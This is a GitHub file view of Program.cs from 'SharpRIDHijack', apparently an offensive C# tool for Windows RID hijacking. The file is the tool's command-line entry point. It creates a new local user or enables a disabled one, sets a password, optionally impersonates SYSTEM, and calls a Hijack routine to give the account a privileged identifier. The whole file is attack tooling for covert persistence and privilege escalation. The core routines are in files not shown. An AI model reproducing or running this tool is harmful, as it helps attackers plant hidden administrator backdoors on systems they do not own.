-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathProgram.cs
More file actions
132 lines (96 loc) · 4.13 KB
/
Copy pathProgram.cs
File metadata and controls
132 lines (96 loc) · 4.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
using System;
using static SharpRIDHijack.system;
namespace SharpRIDHijack
{
public class Program
{
public static void DisplayHlp()
{
Console.WriteLine("\n--user, -u username to use");
Console.WriteLine("--password, -p password to use [if present without --enable a new user will be created otherwise it will enable a user and change its password]");
Console.WriteLine("--enable enables an existing disabled user and hijackes its rid");
Console.WriteLine("--elevate if present will attempt SYSTEM impersonation (use if you are not SYSTEM already)");
}
public static void Main(string[] args)
{
string username = null;
string password = null;
bool enable = false;
bool elevate = false;
for (int i = 0; i < args.Length; i++)
{
if (args[i] == "-u" || args[i] == "--user") { username = args[i + 1]; }
if (args[i] == "-p" || args[i] == "--password") { password = args[i + 1]; }
if (args[i] == "--enable") { enable = true; }
if (args[i] == "--elevate") { elevate = true; }
}
if (username == null) { DisplayHlp(); return; }
if (username != null && password == null && enable == false) {
if (elevate)
{
Console.WriteLine("[+] Elevation mode enabled, attempting elevation....");
bool result = ImpersonateSystem();
if (!result)
{
Console.WriteLine("[-] Impersonation Failed");
return;
}
Console.WriteLine("[+] Impersonated SYSTEM !");
}
rid.Hijack(username);
return;
}
if (username != null && password != null && enable == false)
{
userapi.Create(username, password);
if (elevate)
{
Console.WriteLine("[+] Elevation mode enabled, attempting elevation....");
bool result2 = ImpersonateSystem();
if (!result2)
{
Console.WriteLine("[-] Impersonation Failed");
return;
}
Console.WriteLine("[+] Impersonated SYSTEM !");
}
rid.Hijack(username);
return;
}
if (username != null && password == null && enable == true) {
userapi.Enable(username);
if (elevate)
{
Console.WriteLine("[+] Elevation mode enabled, attempting elevation....");
bool result3 = ImpersonateSystem();
if (!result3)
{
Console.WriteLine("[-] Impersonation Failed");
return;
}
Console.WriteLine("[+] Impersonated SYSTEM !");
}
rid.Hijack(username);
return;
}
if (username != null && password != null && enable == true)
{
userapi.Enable(username, setpassword:true, password:password);
if (elevate)
{
Console.WriteLine("[+] Elevation mode enabled, attempting elevation....");
bool result4 = ImpersonateSystem();
if (!result4)
{
Console.WriteLine("[-] Impersonation Failed");
return;
}
Console.WriteLine("[+] Impersonated SYSTEM !");
}
rid.Hijack(username);
return;
}
DisplayHlp();
}
}
}